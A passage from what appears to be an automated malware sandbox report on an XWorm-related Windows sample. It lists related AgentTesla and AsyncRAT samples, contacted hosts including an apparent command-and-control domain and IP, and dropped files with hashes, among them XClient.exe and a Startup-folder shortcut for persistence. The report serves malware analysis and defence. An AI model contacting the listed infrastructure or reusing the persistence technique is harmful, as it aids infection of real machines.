                    jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                    • ip-api.com/line/?fields=hosting
                    fattigdomsrapporten.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                    • ip-api.com/line/?fields=hosting
                    0HAsH94TVT.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • ip-api.com/line/?fields=hosting
                    shipping doc for Invoice No. 61-FK-24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    Rejected Shipping Documents compiled PL pdf.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    147.185.221.17Hoodbyunlock.exeGet hashmaliciousXWormBrowse
                      x.exeGet hashmaliciousXWormBrowse
                        cougif6lqM.exeGet hashmaliciousDCRat, XWormBrowse
                          FUDE.bin.exeGet hashmaliciousXWormBrowse
                            system47.exeGet hashmaliciousXWormBrowse
                              setup.exeGet hashmaliciousXWormBrowse
                                APPoKkkk8h.exeGet hashmaliciousUnknownBrowse
                                  hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                    file.exeGet hashmaliciousStealerium, SugarDump, XWormBrowse
                                      system.batGet hashmaliciousXWormBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ip-api.comUbk6gnUESo.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        4RXDcatXyT.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 208.95.112.1
                                        jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        fattigdomsrapporten.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 208.95.112.1
                                        0HAsH94TVT.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 208.95.112.1
                                        shipping doc for Invoice No. 61-FK-24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Rejected Shipping Documents compiled PL pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        case-shield.gl.at.ply.ggsystem.batGet hashmaliciousXWormBrowse
                                        • 147.185.221.17

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        SALSGIVERUS4RXDcatXyT.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 147.185.221.22
                                        jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.21
                                        RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 147.185.221.22
                                        PPz346dmz6.exeGet hashmaliciousNjratBrowse
                                        • 147.185.221.22
                                        PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                        • 147.185.221.21
                                        BrxaiME612.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 147.185.221.22
                                        Nursultan.exeGet hashmalicious44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWormBrowse
                                        • 147.185.221.22
                                        aimbot.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.22
                                        Launcher.exeGet hashmaliciousUnknownBrowse
                                        • 147.185.221.22
                                        Launcher.exeGet hashmaliciousUnknownBrowse
                                        • 147.185.221.22
                                        TUT-ASUSUbk6gnUESo.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        4RXDcatXyT.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 208.95.112.1
                                        jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                        • 208.95.112.1
                                        fattigdomsrapporten.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 208.95.112.1
                                        0HAsH94TVT.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 208.95.112.1
                                        shipping doc for Invoice No. 61-FK-24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Rejected Shipping Documents compiled PL pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\XClient.exeRejected Shipping Documents compiled PL pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          Public Holiday mem_Notice 2024.exeGet hashmaliciousAgentTeslaBrowse
                                            D65youPyf5.exeGet hashmaliciousXWormBrowse
                                              81WOMYtzK3.exeGet hashmaliciousAgentTeslaBrowse
                                                AN.exeGet hashmaliciousAgentTeslaBrowse
                                                  FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousAgentTeslaBrowse
                                                    jC48ka41YM.exeGet hashmaliciousAgentTeslaBrowse
                                                      SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exeGet hashmaliciousAgentTeslaBrowse
                                                        Shipping Documents Cos090224.exeGet hashmaliciousAgentTeslaBrowse
                                                          7f3N7x1Rty.exeGet hashmaliciousAveMaria, UACMeBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\80c619d931fa4e5c89fe87aac0b6b143.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.353683843266035
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log

                                                            Download File
                                                            Process:C:\Users\user\XClient.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):142
                                                            Entropy (8bit):5.090621108356562
                                                            Encrypted:false
                                                            SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                            MD5:8C0458BB9EA02D50565175E38D577E35
                                                            SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                            SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                            SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.379571632516198
                                                            Encrypted:false
                                                            SSDEEP:48:yWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//4Uyus:yLHyIFKL3IZ2KRH9OugMs
                                                            MD5:245AFC27BDD936D27F2718073A7C39DE
                                                            SHA1:F57E78F924C4CB534D6F4B8F52FB8BA65F20CB38
                                                            SHA-256:F05853E6FD008CA527D36DF57D1090D463E19659DDCC642D7E1F09825F7DB816
                                                            SHA-512:C71BD5D344D7294A7C395B62CD81B9AF0193AAA096EF4B6874812C307312CE87D68B1F3DEA2DCF3D19DC0D5EC0C4621DD180115E663EEC0A98C21C4F1A0DED26
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\Log.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            File Type:Generic INItialization configuration [WIN]
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):3.6722687970803873
                                                            Encrypted:false
                                                            SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                            MD5:DE63D53293EBACE29F3F54832D739D40
                                                            SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                            SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                            SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                            Malicious:false
                                                            Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ptbyzcc.3he.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uroeidh.hdv.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dch0v1g.hgg.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dmaeg42.y5y.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mvyemiz.nne.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hdnk1qd.qoh.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s4dt5ch.o0z.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ca42505o.43g.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2ubkcle.n4l.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggrjkxtv.ybf.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyugj1nk.vt5.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1ssbwaf.x05.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojeq3dqt.efw.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjmbgog0.ao2.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rixbk2ry.3sn.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yybty45i.ypj.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Sep 9 14:28:18 2024, mtime=Mon Sep 9 14:28:18 2024, atime=Mon Sep 9 14:28:18 2024, length=45984, window=hide
                                                            Category:dropped
                                                            Size (bytes):758
                                                            Entropy (8bit):5.105270186214647
                                                            Encrypted:false
                                                            SSDEEP:12:8L/4fVgZwOC5bUPXvjAoXmawuLEF54t2YZ/elFlSJmkmV:8sfVMwO0gXbAwzkFDqygm
                                                            MD5:962427B9E8973DA536C4627C4AF39E1B
                                                            SHA1:9A9258E89B41F8B9AA51F32DB7D2B6A8F378F0DA
                                                            SHA-256:C007E49E55123D38788D2AC6263C06243A7C32567EB45D399FC5C5E2F89B625E
                                                            SHA-512:9009B465C5A0003A8C2D27B3CE4AAEDC05AA3116C6A1A5C6BA4BEBBA01FEED5225F7E0C3B70BCB21AAF894116BCD0AEE11C529F686CF01B856B8073F05BC12E1
                                                            Malicious:false
                                                            Preview:L..................F.... ..................................................:..DG..Yr?.D..U..k0.&...&...... M........................t. .CFSF..2.....)Y.{ .XClient.exe...t.Y^...H.g.3..(.....gVA.G..k...H......)Y.{)Y.{....[......................l..X.C.l.i.e.n.t...e.x.e...F...J...............-.......I...........Ro.q.....C:\Users\user\XClient.exe.. .....\.....\.....\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.........|....I.J.H..K..:...`.......X.......494126...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                            C:\Users\user\XClient.exe

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):45984
                                                            Entropy (8bit):6.16795797263964
                                                            Encrypted:false
                                                            SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                            MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                            SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                            SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                            SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                            Malicious:false
